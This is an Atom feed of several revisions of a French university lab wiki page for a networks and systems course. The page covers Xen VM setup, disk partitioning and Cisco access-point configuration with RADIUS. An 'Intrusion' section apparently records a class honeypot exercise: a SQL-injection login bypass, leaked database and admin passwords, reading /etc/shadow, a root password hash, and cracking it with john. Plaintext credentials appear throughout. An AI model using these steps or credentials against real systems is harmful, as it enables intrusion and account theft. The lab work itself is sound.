&lt;br /&gt;
au prealable il faut &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
1) formater la partition : &lt;br /&gt;
 mkfs -t ext4 /dev/xvda4&lt;br /&gt;
&lt;br /&gt;
2) Monter la partition que l'on veut sur /mnt &lt;br /&gt;
 mount /dev/xvda4 /mnt&lt;br /&gt;
3) Migrer tout le contenu de var dans mnt &lt;br /&gt;
 cd /var&lt;br /&gt;
 mv * /mnt&lt;br /&gt;
&lt;br /&gt;
4) Dans le fichier fstab rajouter :&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
5) Unmout mnt &lt;br /&gt;
 umount /mnt&lt;br /&gt;
&lt;br /&gt;
6) Monter tout sur dev/xdva&lt;br /&gt;
 mount -a &lt;br /&gt;
7)Verification &lt;br /&gt;
 df&lt;br /&gt;
 dpkg -l&lt;br /&gt;
&lt;br /&gt;
==Redirection DNS==&lt;br /&gt;
&lt;br /&gt;
== Configuration des bornes Wi-Fi ==&lt;br /&gt;
&lt;br /&gt;
Borne classique : Cisco - AIR-CAP1602I-E-K9&lt;br /&gt;
&lt;br /&gt;
Configuration IOS en CLI :&lt;br /&gt;
&lt;br /&gt;
aaa new-model&lt;br /&gt;
!&lt;br /&gt;
!&lt;br /&gt;
aaa group server radius radius_girolle&lt;br /&gt;
 server 193.48.57.182 auth-port 1812 acct-port 1813&lt;br /&gt;
!&lt;br /&gt;
aaa authentication login eap_group1 group radius_group1&lt;br /&gt;
aaa authentication login eap_girolle group radius_girolle&lt;br /&gt;
!         &lt;br /&gt;
dot11 ssid SSID_GIROLLE&lt;br /&gt;
   vlan 107&lt;br /&gt;
   authentication open eap eap_girolle &lt;br /&gt;
   authentication network-eap eap_girolle &lt;br /&gt;
   authentication key-management wpa&lt;br /&gt;
!&lt;br /&gt;
!&lt;br /&gt;
...&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
  encryption vlan 101 mode ciphers aes-ccm tkip&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
interface BVI1&lt;br /&gt;
 ip address 10.60.100.10 255.255.255.0&lt;br /&gt;
!&lt;br /&gt;
radius-server host 193.48.57.182 auth-port 1812 acct-port 1813 key 7 09414A191B0A051C0E1B0D2C22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
10.60.100.10 : adresse IP fixe du point d'accès&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Commandes et verifications /&lt;br /&gt;
ap(config)#interface BVI1&lt;br /&gt;
ap(config-if)# ip address 10.60.100.10 255.255.255.0&lt;br /&gt;
ap(config-if)#exit&lt;br /&gt;
ap#write&lt;br /&gt;
PING ROUTEUR 1 POUR VERIFIER LA CONNEXION&lt;br /&gt;
ap#ping 10.60.100.2 &lt;br /&gt;
Type escape sequence to abort.&lt;br /&gt;
Sending 5, 100-byte ICMP Echos to 10.60.100.2, timeout is 2 seconds:&lt;br /&gt;
.!!!!&lt;br /&gt;
Success rate is 80 percent (4/5), round-trip min/avg/max = 1/1/1 ms&lt;br /&gt;
&lt;br /&gt;
test second routeur : ne fonctionne pas car pas d'addresse ip&lt;br /&gt;
ap#ping 10.60.100.1&lt;br /&gt;
Type escape sequence to abort.&lt;br /&gt;
Sending 5, 100-byte ICMP Echos to 10.60.100.1, timeout is 2 seconds:&lt;br /&gt;
.....&lt;br /&gt;
Success rate is 0 percent (0/5)&lt;br /&gt;
&lt;br /&gt;
Configurer l'adresse par defaut:&lt;br /&gt;
&lt;br /&gt;
ap(config)#ip route 0.0.0.0 0.0.0.0 10.60.100.2&lt;br /&gt;
ap(config)#exit&lt;br /&gt;
ap#sh ip route&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Test ping notre machine virtuelle girolle : &lt;br /&gt;
ap#ping 193.48.57.182&lt;br /&gt;
Type escape sequence to abort.&lt;br /&gt;
Sending 5, 100-byte ICMP Echos to 193.48.57.182, timeout is 2 seconds:&lt;br /&gt;
!!!!!&lt;br /&gt;
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/1/1 ms&lt;br /&gt;
&lt;br /&gt;
==Configuration WLC==&lt;br /&gt;
&lt;br /&gt;
Utilisation de bornes Cisco 2802i&lt;br /&gt;
&lt;br /&gt;
Connection via minicom -os (9600 bauds)&lt;br /&gt;
&lt;br /&gt;
 enable &lt;br /&gt;
 capwap ap ip &amp;lt;ip&amp;gt; &amp;lt;netmask&amp;gt; &amp;lt;gateway&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Intrusion honey.plil.info ==&lt;br /&gt;
&lt;br /&gt;
pour avoir les identifiants de l'admin : ID = ' OR '1'='1 et MDP = ' OR '1'='1&lt;br /&gt;
&lt;br /&gt;
Admin : admin	jesuislechef	admin	Administrateur&lt;br /&gt;
&lt;br /&gt;
Creer le fichier  etc/phpmyadmin/config-db.php&lt;br /&gt;
en allant dans l'onglet: .... on telecharge le fichier qu'on a crée : &lt;br /&gt;
 &amp;lt;?php&lt;br /&gt;
 ##&lt;br /&gt;
 ## database access settings in php format&lt;br /&gt;
 ## automatically generated from /etc/dbconfig-common/phpmyadmin.conf&lt;br /&gt;
 ## by /usr/sbin/dbconfig-generate-include&lt;br /&gt;
 ##&lt;br /&gt;
 ## by default this file is managed via ucf, so you shouldn't have to&lt;br /&gt;
 ## worry about manual changes being silently discarded.  *however*,&lt;br /&gt;
 ## you'll probably also want to edit the configuration file mentioned&lt;br /&gt;
 ## above too.&lt;br /&gt;
 ##&lt;br /&gt;
 $dbuser='phpmyadmin';&lt;br /&gt;
 $dbpass='gencovid19';&lt;br /&gt;
 $basepath='';&lt;br /&gt;
 $dbname='phpmyadmin';&lt;br /&gt;
 $dbserver='localhost';&lt;br /&gt;
 $dbport='3306';&lt;br /&gt;
 $dbtype='mysql';&lt;br /&gt;
&lt;br /&gt;
on reccupere user et mdp pour acceder a la page http://honey.plil.info/phpmyadmin/ &lt;br /&gt;
connexion id : root&lt;br /&gt;
mdp: gencovid19&lt;br /&gt;
&lt;br /&gt;
une fois connecter on recherche les identifiants des utilisateurs ssh :&lt;br /&gt;
id = rex &lt;br /&gt;
mdp: &lt;br /&gt;
&lt;br /&gt;
connexion ssh : ssh rex@honey.plil.info&lt;br /&gt;
 /etc/shadow pour trouver la cle de cryptage du mdp root &lt;br /&gt;
 copier la cle et la mettre dans un fichier (exemple :temp): root:$6$yCvXnJp4SOQwQaxV$vRYUr1fwU1SAPxZ0NbdIw/03ypGXjjRjZKRfX3sa7T2v9XnbI4xG.EyEtcrtASLlvqxuh9Hr6TrOB5Szopd6m/:18525:0:99999:7:::&lt;br /&gt;
 installation de john &lt;br /&gt;
 john nom du fichier&lt;br /&gt;
&lt;br /&gt;
pour aller plus rapidement creer un dictionnaire a partir des indices donnés  : motif doublé 'le mot de passe de root possède la même particularité que le mot de passe administrateur habituel des machines de projets'&lt;br /&gt;
utiliseer crunch?&lt;/div&gt;</summary>
		<author><name>Nekhlas-</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=53097</id>
		<title>TP sysres IMA5sc 2020/2021 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=53097"/>
				<updated>2020-11-02T17:32:22Z</updated>
		
		<summary type="html">&lt;p&gt;Nekhlas- : /* Configuration des bornes Wi-Fi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Explication Infrastructure ==&lt;br /&gt;
&lt;br /&gt;
==Installation VM==&lt;br /&gt;
&lt;br /&gt;
Connexion ssh:&lt;br /&gt;
 ssh pifou@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
Commande (en root su -):&lt;br /&gt;
 xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force&lt;br /&gt;
&amp;lt;br&amp;gt; MAJ gateway : 161&lt;br /&gt;
&amp;lt;br&amp;gt;Nom de domaine: girolle.site&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse IP : 100.64.0.24 MAJ: 193.48.57.172&lt;br /&gt;
&amp;lt;br&amp;gt;Netmask: 255.255.255.240 MAJ: 255.255.255.224&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse MAC : 00:16:3E:3E:E3:15&lt;br /&gt;
&lt;br /&gt;
Repartition des volumes logiques : &lt;br /&gt;
 lvdisplay &lt;br /&gt;
 lvrename &lt;br /&gt;
&lt;br /&gt;
Dans le fichier de configuration de la machine : girolle.cfg&lt;br /&gt;
on rajoute var et home :&lt;br /&gt;
lignes 'phy:/.../xdva3'&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Commandes pour creer et acceder a la VM :&lt;br /&gt;
&lt;br /&gt;
 xl create -c etc/xen/girolle.cfg&lt;br /&gt;
 '''xl console girolle'''&lt;br /&gt;
&lt;br /&gt;
Commandes sur la vm: &lt;br /&gt;
&lt;br /&gt;
dans etc/fstab il faut indiquer les fonctionnalites de xvda3 et xvda4 &lt;br /&gt;
&lt;br /&gt;
au prealable il faut &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
1) formater la partition : &lt;br /&gt;
 mkfs -t ext4 /dev/xvda4&lt;br /&gt;
&lt;br /&gt;
2) Monter la partition que l'on veut sur /mnt &lt;br /&gt;
 mount /dev/xvda4 /mnt&lt;br /&gt;
3) Migrer tout le contenu de var dans mnt &lt;br /&gt;
 cd /var&lt;br /&gt;
 mv * /mnt&lt;br /&gt;
&lt;br /&gt;
4) Dans le fichier fstab rajouter :&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
5) Unmout mnt &lt;br /&gt;
 umount /mnt&lt;br /&gt;
&lt;br /&gt;
6) Monter tout sur dev/xdva&lt;br /&gt;
 mount -a &lt;br /&gt;
7)Verification &lt;br /&gt;
 df&lt;br /&gt;
 dpkg -l&lt;br /&gt;
&lt;br /&gt;
==Redirection DNS==&lt;br /&gt;
&lt;br /&gt;
== Configuration des bornes Wi-Fi ==&lt;br /&gt;
&lt;br /&gt;
Borne classique : Cisco - AIR-CAP1602I-E-K9&lt;br /&gt;
&lt;br /&gt;
Configuration IOS en CLI :&lt;br /&gt;
&lt;br /&gt;
aaa new-model&lt;br /&gt;
!&lt;br /&gt;
!&lt;br /&gt;
aaa group server radius radius_girolle&lt;br /&gt;
 server 193.48.57.182 auth-port 1812 acct-port 1813&lt;br /&gt;
!&lt;br /&gt;
aaa authentication login eap_group1 group radius_group1&lt;br /&gt;
aaa authentication login eap_girolle group radius_girolle&lt;br /&gt;
!         &lt;br /&gt;
dot11 ssid SSID_GIROLLE&lt;br /&gt;
   vlan 107&lt;br /&gt;
   authentication open eap eap_girolle &lt;br /&gt;
   authentication network-eap eap_girolle &lt;br /&gt;
   authentication key-management wpa&lt;br /&gt;
!&lt;br /&gt;
!&lt;br /&gt;
...&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
  encryption vlan 101 mode ciphers aes-ccm tkip&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
interface BVI1&lt;br /&gt;
 ip address 10.60.100.10 255.255.255.0&lt;br /&gt;
!&lt;br /&gt;
radius-server host 193.48.57.182 auth-port 1812 acct-port 1813 key 7 09414A191B0A051C0E1B0D2C22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
10.60.100.10 : adresse IP fixe du point d'accès&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Commandes et verifications /&lt;br /&gt;
ap(config)#interface BVI1&lt;br /&gt;
ap(config-if)# ip address 10.60.100.10 255.255.255.0&lt;br /&gt;
ap(config-if)#exit&lt;br /&gt;
ap#write&lt;br /&gt;
PING ROUTEUR 1 POUR VERIFIER LA CONNEXION&lt;br /&gt;
ap#ping 10.60.100.2 &lt;br /&gt;
Type escape sequence to abort.&lt;br /&gt;
Sending 5, 100-byte ICMP Echos to 10.60.100.2, timeout is 2 seconds:&lt;br /&gt;
.!!!!&lt;br /&gt;
Success rate is 80 percent (4/5), round-trip min/avg/max = 1/1/1 ms&lt;br /&gt;
&lt;br /&gt;
test second routeur : ne fonctionne pas car pas d'addresse ip&lt;br /&gt;
ap#ping 10.60.100.1&lt;br /&gt;
Type escape sequence to abort.&lt;br /&gt;
Sending 5, 100-byte ICMP Echos to 10.60.100.1, timeout is 2 seconds:&lt;br /&gt;
.....&lt;br /&gt;
Success rate is 0 percent (0/5)&lt;br /&gt;
&lt;br /&gt;
Configurer l'adresse par defaut:&lt;br /&gt;
&lt;br /&gt;
ap(config)#ip route 0.0.0.0 0.0.0.0 10.60.100.2&lt;br /&gt;
ap(config)#exit&lt;br /&gt;
ap#sh ip route&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Test ping notre machine virtuelle girolle : &lt;br /&gt;
ap#ping 193.48.57.182&lt;br /&gt;
Type escape sequence to abort.&lt;br /&gt;
Sending 5, 100-byte ICMP Echos to 193.48.57.182, timeout is 2 seconds:&lt;br /&gt;
!!!!!&lt;br /&gt;
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/1/1 ms&lt;br /&gt;
&lt;br /&gt;
==Configuration WLC==&lt;br /&gt;
&lt;br /&gt;
Utilisation de bornes Cisco 2802i&lt;br /&gt;
&lt;br /&gt;
Connection via minicom -os (9600 bauds)&lt;br /&gt;
&lt;br /&gt;
 enable &lt;br /&gt;
 capwap ap ip &amp;lt;ip&amp;gt; &amp;lt;netmask&amp;gt; &amp;lt;gateway&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Intrusion honey.plil.info ==&lt;br /&gt;
&lt;br /&gt;
pour avoir les identifiants de l'admin : ID = ' OR '1'='1 et MDP = ' OR '1'='1&lt;br /&gt;
&lt;br /&gt;
Admin : admin	jesuislechef	admin	Administrateur&lt;br /&gt;
&lt;br /&gt;
Creer le fichier  etc/phpmyadmin/config-db.php&lt;/div&gt;</summary>
		<author><name>Nekhlas-</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=53090</id>
		<title>TP sysres IMA5sc 2020/2021 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=53090"/>
				<updated>2020-11-02T17:25:33Z</updated>
		
		<summary type="html">&lt;p&gt;Nekhlas- : /* Intrusion honey.plil.info */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Explication Infrastructure ==&lt;br /&gt;
&lt;br /&gt;
==Installation VM==&lt;br /&gt;
&lt;br /&gt;
Connexion ssh:&lt;br /&gt;
 ssh pifou@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
Commande (en root su -):&lt;br /&gt;
 xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force&lt;br /&gt;
&amp;lt;br&amp;gt; MAJ gateway : 161&lt;br /&gt;
&amp;lt;br&amp;gt;Nom de domaine: girolle.site&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse IP : 100.64.0.24 MAJ: 193.48.57.172&lt;br /&gt;
&amp;lt;br&amp;gt;Netmask: 255.255.255.240 MAJ: 255.255.255.224&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse MAC : 00:16:3E:3E:E3:15&lt;br /&gt;
&lt;br /&gt;
Repartition des volumes logiques : &lt;br /&gt;
 lvdisplay &lt;br /&gt;
 lvrename &lt;br /&gt;
&lt;br /&gt;
Dans le fichier de configuration de la machine : girolle.cfg&lt;br /&gt;
on rajoute var et home :&lt;br /&gt;
lignes 'phy:/.../xdva3'&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Commandes pour creer et acceder a la VM :&lt;br /&gt;
&lt;br /&gt;
 xl create -c etc/xen/girolle.cfg&lt;br /&gt;
 '''xl console girolle'''&lt;br /&gt;
&lt;br /&gt;
Commandes sur la vm: &lt;br /&gt;
&lt;br /&gt;
dans etc/fstab il faut indiquer les fonctionnalites de xvda3 et xvda4 &lt;br /&gt;
&lt;br /&gt;
au prealable il faut &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
1) formater la partition : &lt;br /&gt;
 mkfs -t ext4 /dev/xvda4&lt;br /&gt;
&lt;br /&gt;
2) Monter la partition que l'on veut sur /mnt &lt;br /&gt;
 mount /dev/xvda4 /mnt&lt;br /&gt;
3) Migrer tout le contenu de var dans mnt &lt;br /&gt;
 cd /var&lt;br /&gt;
 mv * /mnt&lt;br /&gt;
&lt;br /&gt;
4) Dans le fichier fstab rajouter :&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
5) Unmout mnt &lt;br /&gt;
 umount /mnt&lt;br /&gt;
&lt;br /&gt;
6) Monter tout sur dev/xdva&lt;br /&gt;
 mount -a &lt;br /&gt;
7)Verification &lt;br /&gt;
 df&lt;br /&gt;
 dpkg -l&lt;br /&gt;
&lt;br /&gt;
==Redirection DNS==&lt;br /&gt;
&lt;br /&gt;
== Configuration des bornes Wi-Fi ==&lt;br /&gt;
&lt;br /&gt;
Borne classique : Cisco - AIR-CAP1602I-E-K9&lt;br /&gt;
&lt;br /&gt;
Configuration IOS en CLI :&lt;br /&gt;
&lt;br /&gt;
aaa new-model&lt;br /&gt;
!&lt;br /&gt;
!&lt;br /&gt;
aaa group server radius radius_girolle&lt;br /&gt;
 server 193.48.57.182 auth-port 1812 acct-port 1813&lt;br /&gt;
!&lt;br /&gt;
aaa authentication login eap_group1 group radius_group1&lt;br /&gt;
aaa authentication login eap_girolle group radius_girolle&lt;br /&gt;
!         &lt;br /&gt;
dot11 ssid SSID_GIROLLE&lt;br /&gt;
   vlan 107&lt;br /&gt;
   authentication open eap eap_girolle &lt;br /&gt;
   authentication network-eap eap_girolle &lt;br /&gt;
   authentication key-management wpa&lt;br /&gt;
!&lt;br /&gt;
!&lt;br /&gt;
...&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
  encryption vlan 101 mode ciphers aes-ccm tkip&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
interface BVI1&lt;br /&gt;
 ip address 10.60.100.10 255.255.255.240&lt;br /&gt;
!&lt;br /&gt;
radius-server host 193.48.57.182 auth-port 1812 acct-port 1813 key 7 09414A191B0A051C0E1B0D2C22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
10.60.100.10 : adresse IP fixe du point d'accès&lt;br /&gt;
&lt;br /&gt;
==Configuration WLC==&lt;br /&gt;
&lt;br /&gt;
Utilisation de bornes Cisco 2802i&lt;br /&gt;
&lt;br /&gt;
Connection via minicom -os (9600 bauds)&lt;br /&gt;
&lt;br /&gt;
 enable &lt;br /&gt;
 capwap ap ip &amp;lt;ip&amp;gt; &amp;lt;netmask&amp;gt; &amp;lt;gateway&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Intrusion honey.plil.info ==&lt;br /&gt;
&lt;br /&gt;
pour avoir les identifiants de l'admin : ID = ' OR '1'='1 et MDP = ' OR '1'='1&lt;br /&gt;
&lt;br /&gt;
Admin : admin	jesuislechef	admin	Administrateur&lt;br /&gt;
&lt;br /&gt;
Creer le fichier  etc/phpmyadmin/config-db.php&lt;/div&gt;</summary>
		<author><name>Nekhlas-</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=53070</id>
		<title>TP sysres IMA5sc 2020/2021 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=53070"/>
				<updated>2020-11-02T16:31:26Z</updated>
		
		<summary type="html">&lt;p&gt;Nekhlas- : /* Configuration WLC */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Explication Infrastructure ==&lt;br /&gt;
&lt;br /&gt;
==Installation VM==&lt;br /&gt;
&lt;br /&gt;
Connexion ssh:&lt;br /&gt;
 ssh pifou@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
Commande (en root su -):&lt;br /&gt;
 xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force&lt;br /&gt;
&amp;lt;br&amp;gt; MAJ gateway : 161&lt;br /&gt;
&amp;lt;br&amp;gt;Nom de domaine: girolle.site&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse IP : 100.64.0.24 MAJ: 193.48.57.172&lt;br /&gt;
&amp;lt;br&amp;gt;Netmask: 255.255.255.240 MAJ: 255.255.255.224&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse MAC : 00:16:3E:3E:E3:15&lt;br /&gt;
&lt;br /&gt;
Repartition des volumes logiques : &lt;br /&gt;
 lvdisplay &lt;br /&gt;
 lvrename &lt;br /&gt;
&lt;br /&gt;
Dans le fichier de configuration de la machine : girolle.cfg&lt;br /&gt;
on rajoute var et home :&lt;br /&gt;
lignes 'phy:/.../xdva3'&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Commandes pour creer et acceder a la VM :&lt;br /&gt;
&lt;br /&gt;
 xl create -c etc/xen/girolle.cfg&lt;br /&gt;
 '''xl console girolle'''&lt;br /&gt;
&lt;br /&gt;
Commandes sur la vm: &lt;br /&gt;
&lt;br /&gt;
dans etc/fstab il faut indiquer les fonctionnalites de xvda3 et xvda4 &lt;br /&gt;
&lt;br /&gt;
au prealable il faut &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
1) formater la partition : &lt;br /&gt;
 mkfs -t ext4 /dev/xvda4&lt;br /&gt;
&lt;br /&gt;
2) Monter la partition que l'on veut sur /mnt &lt;br /&gt;
 mount /dev/xvda4 /mnt&lt;br /&gt;
3) Migrer tout le contenu de var dans mnt &lt;br /&gt;
 cd /var&lt;br /&gt;
 mv * /mnt&lt;br /&gt;
&lt;br /&gt;
4) Dans le fichier fstab rajouter :&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
5) Unmout mnt &lt;br /&gt;
 umount /mnt&lt;br /&gt;
&lt;br /&gt;
6) Monter tout sur dev/xdva&lt;br /&gt;
 mount -a &lt;br /&gt;
7)Verification &lt;br /&gt;
 df&lt;br /&gt;
 dpkg -l&lt;br /&gt;
&lt;br /&gt;
==Redirection DNS==&lt;br /&gt;
&lt;br /&gt;
== Configuration des bornes Wi-Fi ==&lt;br /&gt;
&lt;br /&gt;
Borne classique : Cisco - AIR-CAP1602I-E-K9&lt;br /&gt;
&lt;br /&gt;
Configuration IOS en CLI :&lt;br /&gt;
&lt;br /&gt;
aaa new-model&lt;br /&gt;
!&lt;br /&gt;
!&lt;br /&gt;
aaa group server radius radius_girolle&lt;br /&gt;
 server 193.48.57.182 auth-port 1812 acct-port 1813&lt;br /&gt;
!&lt;br /&gt;
aaa authentication login eap_group1 group radius_group1&lt;br /&gt;
aaa authentication login eap_girolle group radius_girolle&lt;br /&gt;
!         &lt;br /&gt;
dot11 ssid SSID_GIROLLE&lt;br /&gt;
   vlan 107&lt;br /&gt;
   authentication open eap eap_girolle &lt;br /&gt;
   authentication network-eap eap_girolle &lt;br /&gt;
   authentication key-management wpa&lt;br /&gt;
!&lt;br /&gt;
!&lt;br /&gt;
...&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
  encryption vlan 101 mode ciphers aes-ccm tkip&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
interface BVI1&lt;br /&gt;
 ip address 10.60.100.10 255.255.255.240&lt;br /&gt;
!&lt;br /&gt;
radius-server host 193.48.57.182 auth-port 1812 acct-port 1813 key 7 09414A191B0A051C0E1B0D2C22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
10.60.100.10 : adresse IP fixe du point d'accès&lt;br /&gt;
&lt;br /&gt;
==Configuration WLC==&lt;br /&gt;
&lt;br /&gt;
Utilisation de bornes Cisco 2802i&lt;br /&gt;
&lt;br /&gt;
Connection via minicom -os (9600 bauds)&lt;br /&gt;
&lt;br /&gt;
 enable &lt;br /&gt;
 capwap ap ip &amp;lt;ip&amp;gt; &amp;lt;netmask&amp;gt; &amp;lt;gateway&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Intrusion honey.plil.info ==&lt;br /&gt;
&lt;br /&gt;
pour avoir les identifiants de l'admin : ID = ' OR '1'='1 et MDP = ' OR '1'='1&lt;br /&gt;
&lt;br /&gt;
Admin : admin	jesuislechef	admin	Administrateur&lt;/div&gt;</summary>
		<author><name>Nekhlas-</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=53069</id>
		<title>TP sysres IMA5sc 2020/2021 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=53069"/>
				<updated>2020-11-02T16:21:06Z</updated>
		
		<summary type="html">&lt;p&gt;Nekhlas- : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Explication Infrastructure ==&lt;br /&gt;
&lt;br /&gt;
==Installation VM==&lt;br /&gt;
&lt;br /&gt;
Connexion ssh:&lt;br /&gt;
 ssh pifou@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
Commande (en root su -):&lt;br /&gt;
 xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force&lt;br /&gt;
&amp;lt;br&amp;gt; MAJ gateway : 161&lt;br /&gt;
&amp;lt;br&amp;gt;Nom de domaine: girolle.site&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse IP : 100.64.0.24 MAJ: 193.48.57.172&lt;br /&gt;
&amp;lt;br&amp;gt;Netmask: 255.255.255.240 MAJ: 255.255.255.224&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse MAC : 00:16:3E:3E:E3:15&lt;br /&gt;
&lt;br /&gt;
Repartition des volumes logiques : &lt;br /&gt;
 lvdisplay &lt;br /&gt;
 lvrename &lt;br /&gt;
&lt;br /&gt;
Dans le fichier de configuration de la machine : girolle.cfg&lt;br /&gt;
on rajoute var et home :&lt;br /&gt;
lignes 'phy:/.../xdva3'&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Commandes pour creer et acceder a la VM :&lt;br /&gt;
&lt;br /&gt;
 xl create -c etc/xen/girolle.cfg&lt;br /&gt;
 '''xl console girolle'''&lt;br /&gt;
&lt;br /&gt;
Commandes sur la vm: &lt;br /&gt;
&lt;br /&gt;
dans etc/fstab il faut indiquer les fonctionnalites de xvda3 et xvda4 &lt;br /&gt;
&lt;br /&gt;
au prealable il faut &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
1) formater la partition : &lt;br /&gt;
 mkfs -t ext4 /dev/xvda4&lt;br /&gt;
&lt;br /&gt;
2) Monter la partition que l'on veut sur /mnt &lt;br /&gt;
 mount /dev/xvda4 /mnt&lt;br /&gt;
3) Migrer tout le contenu de var dans mnt &lt;br /&gt;
 cd /var&lt;br /&gt;
 mv * /mnt&lt;br /&gt;
&lt;br /&gt;
4) Dans le fichier fstab rajouter :&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
5) Unmout mnt &lt;br /&gt;
 umount /mnt&lt;br /&gt;
&lt;br /&gt;
6) Monter tout sur dev/xdva&lt;br /&gt;
 mount -a &lt;br /&gt;
7)Verification &lt;br /&gt;
 df&lt;br /&gt;
 dpkg -l&lt;br /&gt;
&lt;br /&gt;
==Redirection DNS==&lt;br /&gt;
&lt;br /&gt;
== Configuration des bornes Wi-Fi ==&lt;br /&gt;
&lt;br /&gt;
Borne classique : Cisco - AIR-CAP1602I-E-K9&lt;br /&gt;
&lt;br /&gt;
Configuration IOS en CLI :&lt;br /&gt;
&lt;br /&gt;
aaa new-model&lt;br /&gt;
!&lt;br /&gt;
!&lt;br /&gt;
aaa group server radius radius_girolle&lt;br /&gt;
 server 193.48.57.182 auth-port 1812 acct-port 1813&lt;br /&gt;
!&lt;br /&gt;
aaa authentication login eap_group1 group radius_group1&lt;br /&gt;
aaa authentication login eap_girolle group radius_girolle&lt;br /&gt;
!         &lt;br /&gt;
dot11 ssid SSID_GIROLLE&lt;br /&gt;
   vlan 107&lt;br /&gt;
   authentication open eap eap_girolle &lt;br /&gt;
   authentication network-eap eap_girolle &lt;br /&gt;
   authentication key-management wpa&lt;br /&gt;
!&lt;br /&gt;
!&lt;br /&gt;
...&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
  encryption vlan 101 mode ciphers aes-ccm tkip&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
interface BVI1&lt;br /&gt;
 ip address 10.60.100.10 255.255.255.240&lt;br /&gt;
!&lt;br /&gt;
